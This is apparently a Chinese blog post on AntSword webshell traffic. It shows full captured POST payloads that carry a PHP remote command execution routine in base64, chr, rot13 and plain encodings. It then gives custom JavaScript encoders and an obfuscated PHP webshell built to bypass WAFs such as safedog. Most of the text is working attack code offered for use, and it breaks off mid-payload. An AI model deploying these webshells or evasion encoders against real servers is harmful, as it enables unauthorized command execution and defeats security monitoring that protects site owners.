插件关注公众号后回复“蚁剑”即可。
原本流量特征
UA头
目前高版本的蚁剑配置的UA头为随机获取,低版本为antSword/v2.1
可在/modules/request.js中修改
// 请求UA const USER_AGENT = require('random-fake-useragent'); const { unescape } = require('querystring');
Base64编码器
POST /vul/unsafeupload/uploads/1.php HTTP/1.1 Host: Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0 Content-Length: 4504 ce17f0873fa1f6=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoYmFzZTY0X2RlY29kZSgiTHp0OE9pOD0iKSwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLmUwM2VhNCI7QG1rZGlyKCR0bWRpcik7aWYoIUBmaWxlX2V4aXN0cygkdG1kaXIpKXtjb250aW51ZTt9JHRtZGlyPXJlYWxwYXRoKCR0bWRpcik7QGNoZGlyKCR0bWRpcik7QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsICIuLiIpOyRjbnRhcnI9QHByZWdfc3BsaXQoIi9cXFxcfFwvLyIsJHRtZGlyKTtmb3IoJGk9MDskaTxzaXplb2YoJGNudGFycik7JGkrKyl7QGNoZGlyKCIuLiIpO307QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsIi8iKTtAcm1kaXIoJHRtZGlyKTticmVhazt9O307O2Z1bmN0aW9uIGFzZW5jKCRvdXQpe3JldHVybiBAYmFzZTY0X2VuY29kZSgkb3V0KTt9O2Z1bmN0aW9uIGFzb3V0cHV0KCl7JG91dHB1dD1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTtlY2hvICJlMjciLiIxZWEiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gIjBiM2RkIi4iMzY4Yjc4Ijt9b2Jfc3RhcnQoKTt0cnl7JHA9YmFzZTY0X2RlY29kZShzdWJzdHIoJF9QT1NUWyJzZmZiYjZlMTlhNjQ3MyJdLDIpKTskcz1iYXNlNjRfZGVjb2RlKHN1YnN0cigkX1BPU1RbIng2MzJhNzlhZWM2ZmYzIl0sMikpOyRlbnZzdHI9QGJhc2U2NF9kZWNvZGUoc3Vic3RyKCRfUE9TVFsiajIyMjU4MTg2Y2NlNjkiXSwyKSk7JGQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pOyRjPXN1YnN0cigkZCwwLDEpPT0iLyI/Ii1jIFwieyRzfVwiIjoiL2MgXCJ7JHN9XCIiO2lmKHN1YnN0cigkZCwwLDEpPT0iLyIpe0BwdXRlbnYoIlBBVEg9Ii5nZXRlbnYoIlBBVEgiKS4iOi91c3IvbG9jYWwvc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL3NiaW46L3Vzci9iaW46L3NiaW46L2JpbiIpO31lbHNle0BwdXRlbnYoIlBBVEg9Ii5nZXRlbnYoIlBBVEgiKS4iO0M6L1dpbmRvd3Mvc3lzdGVtMzI7QzovV2luZG93cy9TeXNXT1c2NDtDOi9XaW5kb3dzO0M6L1dpbmRvd3MvU3lzdGVtMzIvV2luZG93c1Bvd2VyU2hlbGwvdjEuMC87Iik7fWlmKCFlbXB0eSgkZW52c3RyKSl7JGVudmFycj1leHBsb2RlKCJ8fHxhc2xpbmV8fHwiLCAkZW52c3RyKTtmb3JlYWNoKCRlbnZhcnIgYXMgJHYpIHtpZiAoIWVtcHR5KCR2KSkge0BwdXRlbnYoc3RyX3JlcGxhY2UoInx8fGFza2V5fHx8IiwgIj0iLCAkdikpO319fSRyPSJ7JHB9IHskY30iO2Z1bmN0aW9uIGZlKCRmKXskZD1leHBsb2RlKCIsIixAaW5pX2dldCgiZGlzYWJsZV9mdW5jdGlvbnMiKSk7aWYoZW1wdHkoJGQpKXskZD1hcnJheSgpO31lbHNleyRkPWFycmF5X21hcCgndHJpbScsYXJyYXlfbWFwKCdzdHJ0b2xvd2VyJywkZCkpO31yZXR1cm4oZnVuY3Rpb25fZXhpc3RzKCRmKSYmaXNfY2FsbGFibGUoJGYpJiYhaW5fYXJyYXkoJGYsJGQpKTt9O2Z1bmN0aW9uIHJ1bnNoZWxsc2hvY2soJGQsICRjKSB7aWYgKHN1YnN0cigkZCwgMCwgMSkgPT0gIi8iICYmIGZlKCdwdXRlbnYnKSAmJiAoZmUoJ2Vycm9yX2xvZycpIHx8IGZlKCdtYWlsJykpKSB7aWYgKHN0cnN0cihyZWFkbGluaygiL2Jpbi9zaCIpLCAiYmFzaCIpICE9IEZBTFNFKSB7JHRtcCA9IHRlbXBuYW0oc3lzX2dldF90ZW1wX2RpcigpLCAnYXMnKTtwdXRlbnYoIlBIUF9MT0w9KCkgeyB4OyB9OyAkYyA+JHRtcCAyPiYxIik7aWYgKGZlKCdlcnJvcl9sb2cnKSkge2Vycm9yX2xvZygiYSIsIDEpO30gZWxzZSB7bWFpbCgiYUAxMjcuMC4wLjEiLCAiIiwgIiIsICItYnYiKTt9fSBlbHNlIHtyZXR1cm4gRmFsc2U7fSRvdXRwdXQgPSBAZmlsZV9nZXRfY29udGVudHMoJHRtcCk7QHVubGluaygkdG1wKTtpZiAoJG91dHB1dCAhPSAiIikge3ByaW50KCRvdXRwdXQpO3JldHVybiBUcnVlO319cmV0dXJuIEZhbHNlO307ZnVuY3Rpb24gcnVuY21kKCRjKXskcmV0PTA7JGQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pO2lmKGZlKCdzeXN0ZW0nKSl7QHN5c3RlbSgkYywkcmV0KTt9ZWxzZWlmKGZlKCdwYXNzdGhydScpKXtAcGFzc3RocnUoJGMsJHJldCk7fWVsc2VpZihmZSgnc2hlbGxfZXhlYycpKXtwcmludChAc2hlbGxfZXhlYygkYykpO31lbHNlaWYoZmUoJ2V4ZWMnKSl7QGV4ZWMoJGMsJG8sJHJldCk7cHJpbnQoam9pbigiCiIsJG8pKTt9ZWxzZWlmKGZlKCdwb3BlbicpKXskZnA9QHBvcGVuKCRjLCdyJyk7d2hpbGUoIUBmZW9mKCRmcCkpe3ByaW50KEBmZ2V0cygkZnAsMjA0OCkpO31AcGNsb3NlKCRmcCk7fWVsc2VpZihmZSgncHJvY19vcGVuJykpeyRwID0gQHByb2Nfb3BlbigkYywgYXJyYXkoMSA9PiBhcnJheSgncGlwZScsICd3JyksIDIgPT4gYXJyYXkoJ3BpcGUnLCAndycpKSwgJGlvKTt3aGlsZSghQGZlb2YoJGlvWzFdKSl7cHJpbnQoQGZnZXRzKCRpb1sxXSwyMDQ4KSk7fXdoaWxlKCFAZmVvZigkaW9bMl0pKXtwcmludChAZmdldHMoJGlvWzJdLDIwNDgpKTt9QGZjbG9zZSgkaW9bMV0pO0BmY2xvc2UoJGlvWzJdKTtAcHJvY19jbG9zZSgkcCk7fWVsc2VpZihmZSgnYW50c3lzdGVtJykpe0BhbnRzeXN0ZW0oJGMpO31lbHNlaWYocnVuc2hlbGxzaG9jaygkZCwgJGMpKSB7cmV0dXJuICRyZXQ7fWVsc2VpZihzdWJzdHIoJGQsMCwxKSE9Ii8iICYmIEBjbGFzc19leGlzdHMoIkNPTSIpKXskdz1uZXcgQ09NKCdXU2NyaXB0LnNoZWxsJyk7JGU9JHctPmV4ZWMoJGMpOyRzbz0kZS0+U3RkT3V0KCk7JHJldC49JHNvLT5SZWFkQWxsKCk7JHNlPSRlLT5TdGRFcnIoKTskcmV0Lj0kc2UtPlJlYWRBbGwoKTtwcmludCgkcmV0KTt9ZWxzZXskcmV0ID0gMTI3O31yZXR1cm4gJHJldDt9OyRyZXQ9QHJ1bmNtZCgkci4iIDI+JjEiKTtwcmludCAoJHJldCE9MCk/InJldD17JHJldH0iOiIiOzt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7&j22258186cce69=1l&sffbb6e19a6473=MQY21k&x632a79aec6ff3=6MY2QgL2QgIkQ6XFxwaHBzdHVkeV9wcm9cXFdXV1xccGlrYWNodVxcdnVsXFx1bnNhZmV1cGxvYWRcXHVwbG9hZHMiJndob2FtaSZlY2hvIDJjODI4JmNkJmVjaG8gMGYzNTMyMw==&xxy=@eval(@base64_decode($_POST['ce17f0873fa1f6']));
base64编码器的大致工作就是将中间的操作函数全部通过base64加密后,最终使用eval(base64_decode())来执行,但是在此过程中eval()和base64_decode会被识别从而进行拦截
chr编码器
POST /vul/unsafeupload/uploads/1.php HTTP/1.1 Host: Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; de) Presto/2.9.168 Version/11.52 Content-Length: 27138 p6b4bef7012f21=ub&t8def9d1ac14f9=PJY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDM0ODUxJmNkJmVjaG8gNDEyMzY%3D&v9585f4ec5830f=7kY21k&xxy=%40eVAl(cHr(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(115).ChR(101).ChR(116).ChR(40).ChR(34).ChR(100).ChR(105).ChR(115).ChR(112).ChR(108).ChR(97).ChR(121).ChR(.......
可以看到当使用chr编码器时将所有操作函数通过CHR()编码后使用eval来执行,这种方式能够直接绕过safedog
chr编码器
POST /vul/unsafeupload/uploads/1.php HTTP/1.1 Host: Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E) Content-Length: 31892 ca9a2d11387c7e=2U&qc17c36e9b7b25=ITY21k&rfb799084cba76=LHY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDlhODI4MzgxNGUxJmNkJmVjaG8gYzA4N2MyYw%3D%3D&xxy=%40eVAl(cHr(0x40).ChR(0x69).ChR(0x6e).ChR(0x69).ChR(0x5f).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x28).ChR(0x22).ChR(0x64).ChR(0x69).ChR(0x73).ChR(0x70).ChR(0x6c).ChR(0x61).ChR(0x79).ChR(0x5f).ChR(0x65).ChR(0x72).ChR(0x72).ChR(0x6f).
而chr16编码的形式和chr差别不大,也是将所有的操作函数通过CHR()编码后使用eval来执行,只是将其替换为16进制的形式
rot13编码器
使用rot13编码,将中间函数全部进行rot13编码,这样不会出现关键函数,而在最后使用eval(str_rot13())
s8ac55604ca2c9=vx&u4163519a490b5=6tY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDE5MWY2OGEmY2QmZWNobyBiMDBjZjhmYg==&x23a3ea1c851b7=@vav_frg("qvfcynl_reebef", "0");@frg_gvzr_yvzvg(0);$bcqve=@vav_trg("bcra_onfrqve");vs($bcqve) {$bpjq=qveanzr($_FREIRE["FPEVCG_SVYRANZR"]);$bcnee=cert_fcyvg(onfr64_qrpbqr("Ymg8Bv8="),$bcqve);@neenl_chfu($bcnee,$bpjq,flf_trg_grzc_qve());sbernpu($bcnee nf $vgrz) {vs(!@vf_jevgnoyr($vgrz)){pbagvahr;};$gzqve=$vgrz."/.267494p3";@zxqve($gzqve);vs(!@svyr_rkvfgf($gzqve)){pbagvahr;}$gzqve=ernycngu($gzqve);@puqve($gzqve);@vav_frg("bcra_onfrqve", "..");$pagnee=@cert_fcyvg("/\\|//",$gzqve);sbe($v=0;$v<fvmrbs($pagnee);$v++){@puqve("..");};@vav_frg("bcra_onfrqve","/");@ezqve($gzqve);oernx;};};;shapgvba nfrap($bhg){erghea fge_ebg13($bhg);};shapgvba nfbhgchg(){$bhgchg=bo_trg_pbagragf();bo_raq_pyrna();rpub "2po"."s49q";rpub @nfrap($bhgchg);rpub "193n7"."41576q";}bo_fgneg();gel{$c=onfr64_qrpbqr(fhofge($_CBFG["k7p0qpp3610035"],2));$f=onfr64_qrpbqr(fhofge($_CBFG["h4163519n490o5"],2));$raifge=@onfr64_qrpbqr(fhofge($_CBFG["f8np55604pn2p9"],2));$q=qveanzr($_FREIRE["FPEVCG_SVYRANZR"]);$p=fhofge($q,0,1)=="/"?"-p "{$f}"":"/p "{$f}"";vs(fhofge($q,0,1)=="/"){@chgrai("CNGU=".trgrai("CNGU").":/hfe/ybpny/fova:/hfe/ybpny/ova:/hfe/fova:/hfe/ova:/fova:/ova");}ryfr{@chgrai("CNGU=".trgrai("CNGU").";P:/Jvaqbjf/flfgrz32;P:/Jvaqbjf/FlfJBJ64;P:/Jvaqbjf;P:/Jvaqbjf/Flfgrz32/JvaqbjfCbjreFuryy/i1.0/;");}vs(!rzcgl($raifge)){$rainee=rkcybqr("|||nfyvar|||", $raifge);sbernpu($rainee nf $i) {vs (!rzcgl($i)) {@chgrai(fge_ercynpr("|||nfxrl|||", "=", $i));}}}$e="{$c} {$p}";shapgvba sr($s){$q=rkcybqr(",",@vav_trg("qvfnoyr_shapgvbaf"));vs(rzcgl($q)){$q=neenl();}ryfr{$q=neenl_znc('gevz',neenl_znc('fgegbybjre',$q));}erghea(shapgvba_rkvfgf($s)&&vf_pnyynoyr($s)&&!va_neenl($s,$q));};shapgvba ehafuryyfubpx($q, $p) {vs (fhofge($q, 0, 1) == "/" && sr('chgrai') && (sr('reebe_ybt') || sr('znvy'))) {vs (fgefge(ernqyvax("/ova/fu"), "onfu") != SNYFR) {$gzc = grzcanz(flf_trg_grzc_qve(), 'nf');chgrai("CUC_YBY=() { k; }; $p >$gzc 2>&1");vs (sr('reebe_ybt')) {reebe_ybt("n", 1);} ryfr {znvy("[email protected]", "", "", "-oi");}} ryfr {erghea Snyfr;}$bhgchg = @svyr_trg_pbagragf($gzc);@hayvax($gzc);vs ($bhgchg != "") {cevag($bhgchg);erghea Gehr;}}erghea Snyfr;};shapgvba ehapzq($p){$erg=0;$q=qveanzr($_FREIRE["FPEVCG_SVYRANZR"]);vs(sr('flfgrz')){@flfgrz($p,$erg);}ryfrvs(sr('cnffgueh')){@cnffgueh($p,$erg);}ryfrvs(sr('furyy_rkrp')){cevag(@furyy_rkrp($p));}ryfrvs(sr('rkrp')){@rkrp($p,$b,$erg);cevag(wbva(" ",$b));}ryfrvs(sr('cbcra')){$sc=@cbcra($p,'e');juvyr(!@srbs($sc)){cevag(@strgf($sc,2048));}@cpybfr($sc);}ryfrvs(sr('cebp_bcra')){$c = @cebp_bcra($p, neenl(1 => neenl('cvcr', 'j'), 2 => neenl('cvcr', 'j')), $vb);juvyr(!@srbs($vb[1])){cevag(@strgf($vb[1],2048));}juvyr(!@srbs($vb[2])){cevag(@strgf($vb[2],2048));}@spybfr($vb[1]);@spybfr($vb[2]);@cebp_pybfr($c);}ryfrvs(sr('nagflfgrz')){@nagflfgrz($p);}ryfrvs(ehafuryyfubpx($q, $p)) {erghea $erg;}ryfrvs(fhofge($q,0,1)!="/" && @pynff_rkvfgf("PBZ")){$j=arj PBZ('JFpevcg.furyy');$r=$j->rkrp($p);$fb=$r->FgqBhg();$erg.=$fb->ErnqNyy();$fr=$r->FgqRee();$erg.=$fr->ErnqNyy();cevag($erg);}ryfr{$erg = 127;}erghea $erg;};$erg=@ehapzq($e." 2>&1");cevag ($erg!=0)?"erg={$erg}":"";;}pngpu(Rkprcgvba $r){rpub "REEBE://".$r->trgZrffntr();};nfbhgchg();qvr();&x7c0dcc3610035=xvY21k&xxy=@eval(@str_rot13($_POST['x23a3ea1c851b7']));
default默认编码器
ca1c21df2b501a=luY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDRkMTFmYzImY2QmZWNobyBkMjUwOTFhNA==&p72ba1eefea205=rM&vcd1fb13a5c712=zbY21k&xxy=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.3ff308";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\|//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "a8e57"."c6a20";echo @asenc($output);echo "56"."4dd";}ob_start();try{$p=base64_decode(substr($_POST["vcd1fb13a5c712"],2));$s=base64_decode(substr($_POST["ca1c21df2b501a"],2));$envstr=@base64_decode(substr($_POST["p72ba1eefea205"],2));$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c "{$s}"":"/c "{$s}"";if(substr($d,0,1)=="/"){@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");}else{@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");}if(!empty($envstr)){$envarr=explode("|||asline|||", $envstr);foreach($envarr as $v) {if (!empty($v)) {@putenv(str_replace("|||askey|||", "=", $v));}}}$r="{$p} {$c}";function fe($f){$d=explode(",",@ini_get("disable_functions"));if(empty($d)){$d=array();}else{$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};function runshellshock($d, $c) {if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {if (strstr(readlink("/bin/sh"), "bash") != FALSE) {$tmp = tempnam(sys_get_temp_dir(), 'as');putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");if (fe('error_log')) {error_log("a", 1);} else {mail("[email protected]", "", "", "-bv");}} else {return False;}$output = @file_get_contents($tmp);@unlink($tmp);if ($output != "") {print($output);return True;}}return False;};function runcmd($c){$ret=0;$d=dirname($_SERVER["SCRIPT_FILENAME"]);if(fe('system')){@system($c,$ret);}elseif(fe('passthru')){@passthru($c,$ret);}elseif(fe('shell_exec')){print(@shell_exec($c));}elseif(fe('exec')){@exec($c,$o,$ret);print(join(" ",$o));}elseif(fe('popen')){$fp=@popen($c,'r');while(!@feof($fp)){print(@fgets($fp,2048));}@pclose($fp);}elseif(fe('proc_open')){$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);while(!@feof($io[1])){print(@fgets($io[1],2048));}while(!@feof($io[2])){print(@fgets($io[2],2048));}@fclose($io[1]);@fclose($io[2]);@proc_close($p);}elseif(fe('antsystem')){@antsystem($c);}elseif(runshellshock($d, $c)) {return $ret;}elseif(substr($d,0,1)!="/" && @class_exists("COM")){$w=new COM('WScript.shell');$e=$w->exec($c);$so=$e->StdOut();$ret.=$so->ReadAll();$se=$e->StdErr();$ret.=$se->ReadAll();print($ret);}else{$ret = 127;}return $ret;};$ret=@runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();
特征为@ini_set
蚁剑流量混淆改造
b64pass编码器
/** * php::b64pass编码器 * * 把所有 POST 参数都进行了 base64 编码 * * 适用shell: * * <?php @eval(base64_decode($_POST['ant']));?> * */ 'use strict'; module.exports = (pwd, data) => { let randomID = `_0x${Math.random().toString(16).substr(2)}`; data[randomID] = new Buffer(data['_']).toString('base64'); data[pwd] = new Buffer(`eval(base64_decode($_POST[${randomID}]));die();`).toString('base64'); delete data['_']; return data; }
ant=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtfMHgxNmYwMzNjOTZmYmNjXSkpO2RpZSgpOw==&e84c55a2d1a848=HOY21k&jc3785466b27d1=rg&v530a18e4810bc=hNY2QgL2QgIkQ6XFxwaHBzdHVkeV9wcm9cXFdXV1xccGlrYWNodVxcdnVsXFx1bnNhZmV1cGxvYWRcXHVwbG9hZHMiJndob2FtaSZlY2hvIDljNjJhNmZhZGQxJmNkJmVjaG8gOGYzZTE2MzgzYg==
将原本base64数据包中的eval(base64_decode())再次进行base64编码,绕过安全设备对此的拦截
双b64编码器
/** * php::base64编码器 * Create at: 2020/11/21 15:21:10 */ 'use strict'; /* * @param {String} pwd 链接密码 * @param {Array} data 编码器处理前的 payload 数组 * @return {Array} data 编码器处理后的 payload 数组 */ module.exports = (pwd, data, ext={}) => { // ########## 请在下方编写你本身的代码 ################### // 如下代码为 PHP Base64 样例 // 生成一个随机变量名 let randomID = `_0x${Math.random().toString(16).substr(2)}`; // 原有的 payload 在 data['_']中 // 取出来以后,转为 base64 编码并放入 randomID key 下 data['_'] = Buffer.from(data['_']).toString('base64'); // shell 在接收到 payload 后,先处理 pwd 参数下的内容, //data[pwd] = `${data['_']}"));`; data[pwd] = Buffer.from(data['_']).toString('base64'); // ########## 请在上方编写你本身的代码 ################### // 删除 _ 原有的payload delete data['_']; // 返回编码器处理后的 payload 数组 return data; }
使用如下webshell
<?php header('HTTP/1.1 404'); class COMI { public $c=''; function __destruct() { return eval(substr($this->c, 0)); } } $comi = new COMI(); $password = &$password1; $password1 = $_REQUEST['password']; $post = &$password; $post=base64_decode(base64_decode($post)); $lnng1 = &$lnng; $lnng = $post; $lnng2 = $lnng1; @$comi->c = substr($lnng2, 0); ?>
kaba7e5c4d23f=1kY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDg4MDFhJmNkJmVjaG8gZjZmYTQ4Y2Y3&password=UUdsdWFWOXpaWFFvSW1ScGMzQnNZWGxmWlhKeWIzSnpJaXdnSWpBaUtUdEFjMlYwWDNScGJXVmZiR2x0YVhRb01DazdKRzl3WkdseVBVQnBibWxmWjJWMEtDSnZjR1Z1WDJKaGMyVmthWElpS1R0cFppZ2tiM0JrYVhJcElIc2tiMk4zWkQxa2FYSnVZVzFsS0NSZlUwVlNWa1ZTV3lKVFExSkpVRlJmUmtsTVJVNUJUVVVpWFNrN0pHOXdZWEp5UFhCeVpXZGZjM0JzYVhRb1ltRnpaVFkwWDJSbFkyOWtaU2dpVEhwME9FOXBPRDBpS1N3a2IzQmthWElwTzBCaGNuSmhlVjl3ZFhOb0tDUnZjR0Z5Y2l3a2IyTjNaQ3h6ZVhOZloyVjBYM1JsYlhCZlpHbHlLQ2twTzJadmNtVmhZMmdvSkc5d1lYSnlJR0Z6SUNScGRHVnRLU0I3YVdZb0lVQnBjMTkzY21sMFlXSnNaU2drYVhSbGJTa3BlMk52Ym5ScGJuVmxPMzA3SkhSdFpHbHlQU1JwZEdWdExpSXZMbVprWlRobE4yVmhZekExTUNJN1FHMXJaR2x5S0NSMGJXUnBjaWs3YVdZb0lVQm1hV3hsWDJWNGFYTjBjeWdrZEcxa2FYSXBLWHRqYjI1MGFXNTFaVHQ5SkhSdFpHbHlQWEpsWVd4d1lYUm9LQ1IwYldScGNpazdRR05vWkdseUtDUjBiV1JwY2lrN1FHbHVhVjl6WlhRb0ltOXdaVzVmWW1GelpXUnBjaUlzSUNJdUxpSXBPeVJqYm5SaGNuSTlRSEJ5WldkZmMzQnNhWFFvSWk5Y1hGeGNmRnd2THlJc0pIUnRaR2x5S1R0bWIzSW9KR2s5TURza2FUeHphWHBsYjJZb0pHTnVkR0Z5Y2lrN0pHa3JLeWw3UUdOb1pHbHlLQ0l1TGlJcE8zMDdRR2x1YVY5elpYUW9JbTl3Wlc1ZlltRnpaV1JwY2lJc0lpOGlLVHRBY20xa2FYSW9KSFJ0WkdseUtUdGljbVZoYXp0OU8zMDdPMloxYm1OMGFXOXVJR0Z6Wlc1aktDUnZkWFFwZTNKbGRIVnliaUJBWW1GelpUWTBYMlZ1WTI5a1pTZ2tiM1YwS1R0OU8yWjFibU4wYVc5dUlHRnpiM1YwY0hWMEtDbDdKRzkxZEhCMWREMXZZbDluWlhSZlkyOXVkR1Z1ZEhNb0tUdHZZbDlsYm1SZlkyeGxZVzRvS1R0bFkyaHZJQ0pqWXlJdUlqZzVPU0k3WldOb2J5QkFZWE5sYm1Nb0pHOTFkSEIxZENrN1pXTm9ieUFpTmpBNVlqY2lMaUl3TlRrME1DSTdmVzlpWDNOMFlYSjBLQ2s3ZEhKNWV5UndQV0poYzJVMk5GOWtaV052WkdVb2MzVmljM1J5S0NSZlVFOVRWRnNpZURjeE1qRXpNVFl6TlRobVlqa2lYU3d5S1NrN0pITTlZbUZ6WlRZMFgyUmxZMjlrWlNoemRXSnpkSElvSkY5UVQxTlVXeUpyWVdKaE4yVTFZelJrTWpObUlsMHNNaWtwT3lSbGJuWnpkSEk5UUdKaGMyVTJORjlrWldOdlpHVW9jM1ZpYzNSeUtDUmZVRTlUVkZzaWN6QXhaalJtTXpreU1XVm1ZalFpWFN3eUtTazdKR1E5WkdseWJtRnRaU2drWDFORlVsWkZVbHNpVTBOU1NWQlVYMFpKVEVWT1FVMUZJbDBwT3lSalBYTjFZbk4wY2lna1pDd3dMREVwUFQwaUx5SS9JaTFqSUZ3aWV5UnpmVndpSWpvaUwyTWdYQ0o3SkhOOVhDSWlPMmxtS0hOMVluTjBjaWdrWkN3d0xERXBQVDBpTHlJcGUwQndkWFJsYm5Zb0lsQkJWRWc5SWk1blpYUmxibllvSWxCQlZFZ2lLUzRpT2k5MWMzSXZiRzlqWVd3dmMySnBiam92ZFhOeUwyeHZZMkZzTDJKcGJqb3ZkWE55TDNOaWFXNDZMM1Z6Y2k5aWFXNDZMM05pYVc0NkwySnBiaUlwTzMxbGJITmxlMEJ3ZFhSbGJuWW9JbEJCVkVnOUlpNW5aWFJsYm5Zb0lsQkJWRWdpS1M0aU8wTTZMMWRwYm1SdmQzTXZjM2x6ZEdWdE16STdRem92VjJsdVpHOTNjeTlUZVhOWFQxYzJORHRET2k5WGFXNWtiM2R6TzBNNkwxZHBibVJ2ZDNNdlUzbHpkR1Z0TXpJdlYybHVaRzkzYzFCdmQyVnlVMmhsYkd3dmRqRXVNQzg3SWlrN2ZXbG1LQ0ZsYlhCMGVTZ2taVzUyYzNSeUtTbDdKR1Z1ZG1GeWNqMWxlSEJzYjJSbEtDSjhmSHhoYzJ4cGJtVjhmSHdpTENBa1pXNTJjM1J5S1R0bWIzSmxZV05vS0NSbGJuWmhjbklnWVhNZ0pIWXBJSHRwWmlBb0lXVnRjSFI1S0NSMktTa2dlMEJ3ZFhSbGJuWW9jM1J5WDNKbGNHeGhZMlVvSW54OGZHRnphMlY1Zkh4OElpd2dJajBpTENBa2Rpa3BPMzE5ZlNSeVBTSjdKSEI5SUhza1kzMGlPMloxYm1OMGFXOXVJR1psS0NSbUtYc2taRDFsZUhCc2IyUmxLQ0lzSWl4QWFXNXBYMmRsZENnaVpHbHpZV0pzWlY5bWRXNWpkR2x2Ym5NaUtTazdhV1lvWlcxd2RIa29KR1FwS1hza1pEMWhjbkpoZVNncE8zMWxiSE5sZXlSa1BXRnljbUY1WDIxaGNDZ25kSEpwYlNjc1lYSnlZWGxmYldGd0tDZHpkSEowYjJ4dmQyVnlKeXdrWkNrcE8zMXlaWFIxY200b1puVnVZM1JwYjI1ZlpYaHBjM1J6S0NSbUtTWW1hWE5mWTJGc2JHRmliR1VvSkdZcEppWWhhVzVmWVhKeVlYa29KR1lzSkdRcEtUdDlPMloxYm1OMGFXOXVJSEoxYm5Ob1pXeHNjMmh2WTJzb0pHUXNJQ1JqS1NCN2FXWWdLSE4xWW5OMGNpZ2taQ3dnTUN3Z01Ta2dQVDBnSWk4aUlDWW1JR1psS0Nkd2RYUmxiblluS1NBbUppQW9abVVvSjJWeWNtOXlYMnh2WnljcElIeDhJR1psS0NkdFlXbHNKeWtwS1NCN2FXWWdLSE4wY25OMGNpaHlaV0ZrYkdsdWF5Z2lMMkpwYmk5emFDSXBMQ0FpWW1GemFDSXBJQ0U5SUVaQlRGTkZLU0I3SkhSdGNDQTlJSFJsYlhCdVlXMG9jM2x6WDJkbGRGOTBaVzF3WDJScGNpZ3BMQ0FuWVhNbktUdHdkWFJsYm5Zb0lsQklVRjlNVDB3OUtDa2dleUI0T3lCOU95QWtZeUErSkhSdGNDQXlQaVl4SWlrN2FXWWdLR1psS0NkbGNuSnZjbDlzYjJjbktTa2dlMlZ5Y205eVgyeHZaeWdpWVNJc0lERXBPMzBnWld4elpTQjdiV0ZwYkNnaVlVQXhNamN1TUM0